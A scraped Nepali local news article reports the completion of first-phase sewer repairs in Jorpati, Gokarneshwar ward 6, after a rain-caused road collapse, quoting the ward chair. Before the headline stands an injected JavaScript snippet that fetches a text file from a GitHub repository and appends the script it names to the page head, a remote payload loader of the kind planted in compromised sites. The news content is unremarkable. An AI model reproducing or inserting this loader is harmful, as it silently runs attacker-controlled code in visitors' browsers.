;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); जोरपाटीमा ढलको पहिलो चरणको काम सम्पन्न, सानो बजार जोखिमबाट मुक्त – जुनेली न्युज
मङ्लबार, असार ११, २०८२
  • होमपेज
  • जोरपाटीमा ढलको पहिलो चरणको काम सम्पन्न, सानो बजार जोखिमबाट मुक्त
Breaking News

जोरपाटीमा ढलको पहिलो चरणको काम सम्पन्न, सानो बजार जोखिमबाट मुक्त

जुनेली न्युज, काठमाडौँ ।

 

केही समय अगाडि आएको भारी वर्षका कारण फुटेको ढलको पहिलो चरणको मर्मत सम्पन्न भएको छ।

 

अब दोश्रो चरणमा फुटेको ढलको निर्माण पानी निकालेर च्याम्बर र सडक पिच सम्मको कार्य बाँकी रहेको छ।

सवारी साधन आवत जावत भने खुली सकेको वडा नं ६ का वडा अध्यक्ष नवराज लामाले बताउनु भयो।

 

जोरपाटी देखि सुन्दरीजल जाने बाटो छेउमा ढलको क्षमताले नभ्याएर बीच सडक भासिएको थियो। भासिएको ढल सहितको सडक नगरपालिकाले इन्जिनियर राखेर तत्काल मर्मत सुचारु गरेको छ।

 

गोकर्णेश्वर नगरपालिका वडा नं ६ मा पर्ने उक्त ठाउँको प्रत्यक्ष निगरानीमा वडा अध्यक्ष नवराज लामाले गरेका छन्। राती सम्म बसेर मर्मत कार्य निगरानी गरेको वडा अध्यक्ष लामाको भनाइ छ।

फेसबुक प्रतिक्रियाहरु